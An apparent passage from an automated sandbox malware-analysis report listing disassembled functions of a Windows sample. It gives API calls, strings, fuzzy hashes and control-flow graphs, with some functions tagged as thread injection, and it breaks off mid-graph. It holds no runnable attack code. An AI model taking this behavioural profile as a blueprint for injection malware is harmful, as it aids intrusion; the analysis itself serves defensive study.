                                                            • Opcode Fuzzy Hash: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                            • Instruction Fuzzy Hash: BE21D17290434A9AD731EA64E845F6BB3ECDF91750F02042BF744C3341FB64AE4893A2
                                                            Function 00CCF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00CCF33E), ref: 00CCF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 00CCF389
                                                            • CryptUnprotectMemory failed, xrefs: 00CCF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                            • Instruction ID: 4b7cefbfa6cd8862c78db8bc376378448b77ab4cb029b99b7040708834df9d70
                                                            • Opcode Fuzzy Hash: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                            • Instruction Fuzzy Hash: A3110331A007A9BBEF119B21DC45F6E3B56FF04720B08416EFC559B2A1DA709E0296A2
                                                            Function 00CCB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CCB9B8
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                            • Instruction ID: 2d5fc86bec372f8e1035436abe26daaed0fdf2f36071d77ff3a511c646feda25
                                                            • Opcode Fuzzy Hash: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                            • Instruction Fuzzy Hash: B501D263500351A99A346BA6CC87E6BA7ACEE91770F40841EF599D7082EB30DD4092B1
                                                            Function 00CD101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00CD1160,?,00000000,00000000), ref: 00CD1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00CD108A
                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                            • Instruction ID: 97df4a88994c7d4a28464b8da6e808a5c9613c0f53dbb3127b493d5bd7711cf1
                                                            • Opcode Fuzzy Hash: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                            • Instruction Fuzzy Hash: 4101A2B93443497BD3346E64ED51F7A7398EB41751F24002FFA8692380CAE168858625
                                                            Function 00CC1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CCE2E8: _swprintf.LIBCMT ref: 00CCE30E
                                                              • Part of subcall function 00CCE2E8: _strlen.LIBCMT ref: 00CCE32F
                                                              • Part of subcall function 00CCE2E8: SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                              • Part of subcall function 00CCE2E8: GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                              • Part of subcall function 00CCE2E8: GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                            • SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                            • Instruction ID: 968b01009f00042b7a95640bf549a54c323b3d9b6307ea98a4ba58ea4b1fa4d0
                                                            • Opcode Fuzzy Hash: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                            • Instruction Fuzzy Hash: C9F036301043C8A6EF155F51CC0DFA93B599B5634DF0C4119FD58955A2C778CA91AA70
                                                            Function 00CD0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                            • GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CD0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                            • Instruction ID: a54e194efadc6537bb13b07daf504ea169e1568b874fa844cf7a1086cc1482b8
                                                            • Opcode Fuzzy Hash: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                            • Instruction Fuzzy Hash: 16D05B7150456477C6103324AD05FBF39049B12731B54472AF579552F5CE154AC19697
                                                            Function 00CCE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00CCDA55,?), ref: 00CCE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CCDA55,?), ref: 00CCE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                            • Instruction ID: 66bd738cbe5644ada963358f16c51e3f6c7f2713c914d702ae9c4e772cd5cf5c
                                                            • Opcode Fuzzy Hash: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                            • Instruction Fuzzy Hash: 34C0803124079076E73037757C0DF576E585B01B11F05045DF641E91D1DEE5C540C7E1

                                                            Execution Graph

                                                            Execution Coverage:4.5%
                                                            Dynamic/Decrypted Code Coverage:33.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph 22066 7ffd9bc6d6bd 22067 7ffd9bc6d6cb SuspendThread 22066->22067 22069 7ffd9bc6d7a4 22067->22069 22070 7ffd9bc6edfc 22071 7ffd9bc6ee33 ResumeThread 22070->22071 22073 7ffd9bc6ef04 22071->22073 22062 7ffd9bc6ef59 22063 7ffd9bc6ef67 FindCloseChangeNotification 22062->22063 22065 7ffd9bc6f044 22063->22065 22058 7ffd9bc70ba5 22059 7ffd9bc70bbf GetFileAttributesW 22058->22059 22061 7ffd9bc70c85 22059->22061

                                                            Executed Functions

                                                            Function 00007FFD9BAC0D73 Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86f0abc37fac186a41e4243050df4ed8da6a3919c3713abc2a251da545c37c46
                                                            • Instruction ID: ecd3afc0c26a51ec82e24cf6ab886140fcddd8c9384b2f9de19ec56992485469
                                                            • Opcode Fuzzy Hash: 86f0abc37fac186a41e4243050df4ed8da6a3919c3713abc2a251da545c37c46
                                                            • Instruction Fuzzy Hash: 83A17C71A19A8D8FE7A9DB68C8657A97BF1FF59314F0102BAD009D72D6CBB42801CB40
                                                            Function 00007FFD9BAC0B47 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420
                                                            • Opcode ID: af6d95d4c526b924f7415ceca3a264e006e7bb13e1e04ad53300c5ceb5f1ba91
                                                            • Instruction ID: 654086f52e8ed77b8993f3478602a336455dc59e3cedd3547033886513852f0e
                                                            • Opcode Fuzzy Hash: af6d95d4c526b924f7415ceca3a264e006e7bb13e1e04ad53300c5ceb5f1ba91
                                                            • Instruction Fuzzy Hash: 7D11AC32A2964D8FCB44EF2CE8515E9B7A0FB95324B0103AAE849D3261D730A965CBC1
                                                            Function 00007FFD9BC6EDFC Relevance: 1.7, APIs: 1, Instructions: 159threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 15015a10b6ca3b1dd6ed5cd26d5d237adf2ce05e32c1ceb83de293a74d5cb689
                                                            • Instruction ID: 5c469610fe09e76c7bfa6cf494cf6b924304e9081e7e2fd8a056dca81a755329
                                                            • Opcode Fuzzy Hash: 15015a10b6ca3b1dd6ed5cd26d5d237adf2ce05e32c1ceb83de293a74d5cb689
                                                            • Instruction Fuzzy Hash: 2A517A7090D78D8FDB55DFA8C854AE9BFF0EF1A310F1441ABD049DB292DA389886CB11
                                                            Function 00007FFD9BC6EF59 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: ba9d2fd092359a6d85d2f4a622d59af0c0585d047537b22bf229d9a7598f0ad3
                                                            • Instruction ID: f28005a8ed3a11149279f2720b069f138e8f0d77078e525a18fd20d40eb2ff3a
                                                            • Opcode Fuzzy Hash: ba9d2fd092359a6d85d2f4a622d59af0c0585d047537b22bf229d9a7598f0ad3
                                                            • Instruction Fuzzy Hash: D8416D30D0865D8FDB58DFA8D894BEDBBF0EF1A310F1041AAD049D7292DA349885CB01
                                                            Function 00007FFD9BC6D6BD Relevance: 1.6, APIs: 1, Instructions: 137threadinjectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 7ffd9bc6d6bd-7ffd9bc6d6c9 28 7ffd9bc6d6d4-7ffd9bc6d7a2 SuspendThread 27->28 29 7ffd9bc6d6cb-7ffd9bc6d6d3 27->29 33 7ffd9bc6d7a4 28->33 34 7ffd9bc6d7aa-7ffd9bc6d7f4 28->34 29->28 33->34
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: SuspendThread
                                                            • String ID:
                                                            • API String ID: 3178671153-0
                                                            • Opcode ID: b37b5f5de481b4629cbc31b68b6ecad28ec119321c214995d6cb9faf0ea2723a
                                                            • Instruction ID: 042375073d22e92f4b76e862c3507f45482c38900bfaf619db61d019ed9f4be8
                                                            • Opcode Fuzzy Hash: b37b5f5de481b4629cbc31b68b6ecad28ec119321c214995d6cb9faf0ea2723a
                                                            • Instruction Fuzzy Hash: 51414A70E0864D8FDB58DFA8D899AEDBBF0FB5A310F10416AD049E7296DA70A845CB41
                                                            Function 00007FFD9BC70BA5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 37 7ffd9bc70ba5-7ffd9bc70c83 GetFileAttributesW 41 7ffd9bc70c8b-7ffd9bc70cc9 37->41 42 7ffd9bc70c85 37->42 42->41
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 00b62097e86915652eb2d2914d097edd40bbc9d04b53a109c5bfc13047177b3d
                                                            • Instruction ID: fddab31f820f2de3f8e3361ad54a45fb444b1f0b775f0fddc17225f29e018272
                                                            • Opcode Fuzzy Hash: 00b62097e86915652eb2d2914d097edd40bbc9d04b53a109c5bfc13047177b3d
                                                            • Instruction Fuzzy Hash: 8041F870E08A1C8FDB98DF98D895AEDBBF0FB59310F10416AD049E7251DA71A885CF41
                                                            Function 00007FFD9C1CE8E8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: a6caba59541b1ad9c29bbd82daa29fdaf2952bf1872f2a07a84434cb67443449
                                                            • Instruction ID: 1616a04015d8fe775aa6da6f6cdf22118bbc0cbf87e1b5fcf3ca30c3566ed137
                                                            • Opcode Fuzzy Hash: a6caba59541b1ad9c29bbd82daa29fdaf2952bf1872f2a07a84434cb67443449
                                                            • Instruction Fuzzy Hash: 95517272E4854E8FDB68EB98C4A15FDB7B1FF59380F1041BAE01AE7282CA346905CB44
                                                            Function 00007FFD9C1C28E8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 691ee40fd35d7e92cf45fdb1ab988d0ac5407be2ed5bbcfbeb14af8eac0e7ff3
                                                            • Instruction ID: 1e98e0d5e183bd3dd1bd896e1fefec69f592e79bed99a3bb6347888a5f2e21b5
                                                            • Opcode Fuzzy Hash: 691ee40fd35d7e92cf45fdb1ab988d0ac5407be2ed5bbcfbeb14af8eac0e7ff3
                                                            • Instruction Fuzzy Hash: 3C414831E4861E8FDB69EBE4C4A55BDB7B1FF59304F1040BEE01AA7296CE386901CB04
                                                            Function 00007FFD9BD139FF Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 107 7ffd9bd139ff-7ffd9bd13a01 108 7ffd9bd13a62 107->108 109 7ffd9bd13a03-7ffd9bd13a1e 107->109 110 7ffd9bd13a64 108->110 109->108 112 7ffd9bd13a6f-7ffd9bd13b56 110->112 122 7ffd9bd13b57 112->122 122->122
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826966376.00007FFD9BD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bd10000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e
                                                            • API String ID: 0-4024072794
                                                            • Opcode ID: 78a9dc4d1ce84b2a90cbfd0c4877b0bb78275d3a38fe167cb256c0ea2480c52b
                                                            • Instruction ID: a9a49850c33fdb1de61ea25110cee17ad034507a22e1267f9039033f4c817bfa
                                                            • Opcode Fuzzy Hash: 78a9dc4d1ce84b2a90cbfd0c4877b0bb78275d3a38fe167cb256c0ea2480c52b
                                                            • Instruction Fuzzy Hash: 9B316171A1DA4E8FDB6CEB48C8A1D68B7E1FF58314F0511F9E00DD7292DA34A981CB42
                                                            Function 00007FFD9C1CADA0 Relevance: .7, Instructions: 690COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 123 7ffd9c1cada0-7ffd9c1cadba 124 7ffd9c1cb3bc-7ffd9c1cb3ca 123->124 125 7ffd9c1cadc0-7ffd9c1cadd0 123->125 126 7ffd9c1cb3cc-7ffd9c1cb3d0 124->126 127 7ffd9c1cb3d1-7ffd9c1cb3e0 124->127 128 7ffd9c1cb41a-7ffd9c1cb430 125->128 129 7ffd9c1cadd6-7ffd9c1cae11 125->129 126->127 133 7ffd9c1cb47a-7ffd9c1cb48d 128->133 134 7ffd9c1cb432-7ffd9c1cb456 128->134 136 7ffd9c1caeaa-7ffd9c1caeb2 129->136 137 7ffd9c1cae16-7ffd9c1cae1f 136->137 138 7ffd9c1caeb8 136->138 137->128 141 7ffd9c1cae25-7ffd9c1cae30 137->141 139 7ffd9c1caec2-7ffd9c1caedf 138->139 146 7ffd9c1caee6-7ffd9c1caef7 139->146 142 7ffd9c1caeba-7ffd9c1caebe 141->142 143 7ffd9c1cae36-7ffd9c1cae4a 141->143 142->139 144 7ffd9c1cae4c-7ffd9c1cae63 143->144 145 7ffd9c1caea3-7ffd9c1caea7 143->145 144->128 147 7ffd9c1cae69-7ffd9c1cae75 144->147 145->136 152 7ffd9c1caef9-7ffd9c1caf0e 146->152 153 7ffd9c1caf10-7ffd9c1caf1f 146->153 148 7ffd9c1cae77-7ffd9c1cae8b 147->148 149 7ffd9c1cae8f-7ffd9c1caea0 147->149 148->144 151 7ffd9c1cae8d 148->151 149->145 151->145 152->153 157 7ffd9c1caf41-7ffd9c1cafae 153->157 158 7ffd9c1caf21-7ffd9c1caf3c 153->158 166 7ffd9c1cafff-7ffd9c1cb046 157->166 167 7ffd9c1cafb0-7ffd9c1cafc3 157->167 164 7ffd9c1cb379-7ffd9c1cb399 158->164 171 7ffd9c1cb39d-7ffd9c1cb3aa 164->171 177 7ffd9c1cb04a-7ffd9c1cb06b 166->177 167->128 169 7ffd9c1cafc9-7ffd9c1caff7 167->169 178 7ffd9c1caff8-7ffd9c1caffd 169->178 173 7ffd9c1cb3ac-7ffd9c1cb3b6 171->173 173->125 175 7ffd9c1cb3bb 173->175 175->124 181 7ffd9c1cb0dc-7ffd9c1cb0ed 177->181 182 7ffd9c1cb06d-7ffd9c1cb071 177->182 178->167 180 7ffd9c1caffe 178->180 180->166 184 7ffd9c1cb0ee-7ffd9c1cb0f1 181->184 182->178 185 7ffd9c1cb073 182->185 187 7ffd9c1cb0f7-7ffd9c1cb0fb 184->187 186 7ffd9c1cb09c-7ffd9c1cb0ad 185->186 186->187 196 7ffd9c1cb0af-7ffd9c1cb0bd 186->196 188 7ffd9c1cb0fd-7ffd9c1cb0ff 187->188 189 7ffd9c1cb149-7ffd9c1cb151 188->189 190 7ffd9c1cb101-7ffd9c1cb10f 188->190 194 7ffd9c1cb19b-7ffd9c1cb1a3 189->194 195 7ffd9c1cb153-7ffd9c1cb15c 189->195 192 7ffd9c1cb111-7ffd9c1cb115 190->192 193 7ffd9c1cb180-7ffd9c1cb195 190->193 192->186 203 7ffd9c1cb117 192->203 193->194 198 7ffd9c1cb1a9-7ffd9c1cb1c2 194->198 199 7ffd9c1cb22b-7ffd9c1cb239 194->199 200 7ffd9c1cb15f-7ffd9c1cb161 195->200 201 7ffd9c1cb12e-7ffd9c1cb143 196->201 202 7ffd9c1cb0bf-7ffd9c1cb0c3 196->202 198->199 204 7ffd9c1cb1c4-7ffd9c1cb1c5 198->204 205 7ffd9c1cb2aa-7ffd9c1cb2ab 199->205 206 7ffd9c1cb23b-7ffd9c1cb23d 199->206 207 7ffd9c1cb1d2-7ffd9c1cb1d4 200->207 208 7ffd9c1cb163-7ffd9c1cb165 200->208 201->189 202->177 217 7ffd9c1cb0c5 202->217 203->201 211 7ffd9c1cb1c6-7ffd9c1cb1d0 204->211 210 7ffd9c1cb2db-7ffd9c1cb2dd 205->210 212 7ffd9c1cb2b9-7ffd9c1cb2bb 206->212 213 7ffd9c1cb23f 206->213 221 7ffd9c1cb1d5-7ffd9c1cb1d7 207->221 215 7ffd9c1cb167 208->215 216 7ffd9c1cb1e1-7ffd9c1cb1e5 208->216 223 7ffd9c1cb34e-7ffd9c1cb377 210->223 224 7ffd9c1cb2df 210->224 211->207 218 7ffd9c1cb32c 212->218 219 7ffd9c1cb2bd-7ffd9c1cb2bf 212->219 213->211 220 7ffd9c1cb241 213->220 215->184 222 7ffd9c1cb169 215->222 225 7ffd9c1cb1e7 216->225 226 7ffd9c1cb261-7ffd9c1cb27b 216->226 217->181 218->171 227 7ffd9c1cb32e-7ffd9c1cb330 218->227 228 7ffd9c1cb33b-7ffd9c1cb33f 219->228 229 7ffd9c1cb2c1 219->229 230 7ffd9c1cb248-7ffd9c1cb24c 220->230 242 7ffd9c1cb258-7ffd9c1cb260 221->242 243 7ffd9c1cb1d8 221->243 232 7ffd9c1cb16e-7ffd9c1cb174 222->232 223->164 233 7ffd9c1cb2fc-7ffd9c1cb30a 224->233 225->232 234 7ffd9c1cb1e9 225->234 254 7ffd9c1cb2ad-7ffd9c1cb2b6 226->254 255 7ffd9c1cb27d-7ffd9c1cb28b 226->255 227->173 237 7ffd9c1cb332 227->237 228->175 239 7ffd9c1cb341 228->239 229->230 238 7ffd9c1cb2c3 229->238 240 7ffd9c1cb2c8-7ffd9c1cb2ce 230->240 241 7ffd9c1cb24e 230->241 236 7ffd9c1cb1f0-7ffd9c1cb215 232->236 253 